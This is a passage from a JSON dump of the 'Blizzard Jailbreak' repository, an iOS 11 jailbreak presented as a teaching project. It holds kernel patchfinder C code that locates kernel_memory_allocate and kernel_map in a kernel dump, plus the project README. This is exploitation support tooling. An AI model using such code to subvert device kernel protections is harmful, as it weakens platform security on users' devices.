200, INSN_ADRP);\n    if (!adrp) {\n        
return 0;\n    }\n    \n    adrp += 4;\n    \n    uint64_t adrp2 = Step64(Kernel, adrp, 200, INSN_ADRP);\n    if (adrp2) {\n        adrp = adrp2; // non-A12\n    }\n    \n    addr = Calc64(Kernel, adrp - 4, adrp + 8, 9);\n    if (!addr) {\n        return 0;\n    }\n    \n    return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_memory_allocate() {\n    uint64_t ref = Find_strref(\"\\\"kernel_memory_allocate: VM is not ready\\\"\", 1, 0, true);\n    if (!ref) {\n        return 0;\n    }\n    ref -= KernDumpBase;\n    \n    uint64_t func = BOF64(Kernel, XNUCore_Base, ref);\n    if (!func) {\n        return 0;\n    }\n    \n    return func + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_map() {\n    uint64_t kalloc_canblock = Find_kalloc_canblock();\n    if (!kalloc_canblock) {\n        return 0;\n    }\n    kalloc_canblock -= (KernDumpBase + kernel_slide);\n    \n    uint64_t kern_alloc = Find_kernel_memory_allocate();\n    if (!kern_alloc) {\n        return 0;\n    }\n    kern_alloc -= (KernDumpBase + kernel_slide);\n    \n    uint64_t val = 0;\n    uint64_t func = kalloc_canblock;\n    \n    for (int i = 0; i < 5; i++) {\n        func = Step64(Kernel, func + 4, 4*80, INSN_CALL);\n        \n        if (Follow_call64(Kernel, func) == kern_alloc) {\n            val = Calc64(Kernel, kalloc_canblock, func, 10);\n            break;\n        }\n    }\n    \n    if (!val) {\n        return 0;\n    }\n    \n    return val + KernDumpBase + kernel_slide;\n}\n"
  },
  {
    "path": "README.md",
    "content": "# Blizzard Jailbreak\nAn Open-Source iOS 11.0 to 11.4.1 Jailbreak.\n\nThis jailbreak is aimed at beginner jailbreak developers who want to learn how to build iOS jailbreaks.\nThe code is kept simple, with only the necessary components added, while keeping the jailbreak functional.\n\n### NOT SUITABLE FOR PUBLIC USE RIGHT NOW! WAIT FOR ME TO FINISH IT!\n\n### Part of my <a href=\"https://github.com/GeoSn0w/OpenJailbreak\">OpenJailbreak Project</a>.\n\nFeel free to modify the code as long as you give proper credit where it is due.\n\n### Speaking of credits\nSpecial thanks to the following developers. Their work is used in this project:\n* <a href=\"https://twitter.com/Jakeashacks\">Jake James</a>\n* <a href=\"https://twitter.com/Pwn20wnd\">Pwn20wnd</a>\n* <a href=\"https://twitter.com/electra_team\">Electra Team</a>\n\n### Find Me on Social Media:\n* <a href=\"https://twitter.com/FCE365\">GeoSn0w (Personal Dev Account)</a>\n* <a href=\"https://twitter.com/GetBlizzardJB\">Blizzard Jailbreak</a>\n* <a href=\"https://youtube.com/fce365official\">iDevice Central YouTube Channel</a>\n\n### My Websites\n* <a href=\"https://idevicecentral.com\">Latest iOS 16 Jailbreak News</a>\n* <a href=\"https://gametutorialpro.com\">Latest Gaming News & Guides</a>\n* <a href=\"https://jailbreak.fce365.info\">iOS Jailbreak Forum</a>\n* <a href=\"https://gsmbypass.com\">Latest FRP Bypass Tools & Guides</a>\n"
  },
  {
    "path": "Vanity/readme.md",
    "content": "This folder contains the logo, wallpapers, and other press-kit material.\n"
  }
]